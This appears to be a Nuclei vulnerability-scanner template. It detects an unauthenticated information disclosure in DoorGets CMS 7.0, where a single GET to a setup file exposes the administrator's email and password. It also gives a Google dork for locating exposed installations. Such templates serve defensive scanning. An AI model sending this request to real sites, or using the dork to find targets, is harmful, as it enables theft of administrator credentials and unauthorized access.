id: doorgets-info-disclosure info: name: DoorGets CMS v7.0 - Information Disclosure author: r3Y3r53 severity: high description: | doorGets 7.0 has a sensitive information disclosure vulnerability in /setup/temp/admin.php. A remote unauthenticated attacker could exploit this vulnerability to obtain administrator's password. reference: - https://packetstormsecurity.com/files/174236/DoorGets-CMS-7.0-Information-Disclosure.html - https://sourceforge.net/projects/doorgets-cms/files/latest/download?source=directory metadata: verified: true max-request: 1 google-dork: "Powered with doorGets ™" tags: doorgets,cms,packetstorm,disclosure http: - method: GET path: - "{{BaseURL}}/v12/setup/temp/admin.php" matchers-condition: and matchers: - type: word part: body words: - ':"email";' - ':"password";' condition: and - type: word part: header words: - 'text/html' - type: status status: - 200 # digest: 4a0a0047304502202ad64893b270a582a3f566b9c39a9eac244dbb36154b1022029daf94a8eed140022100c1f18277a38a4586d0eca6b19ecf107b2b968da7302dde1006420089330d0c8c:922c64590222798bb761d5b6d8e72950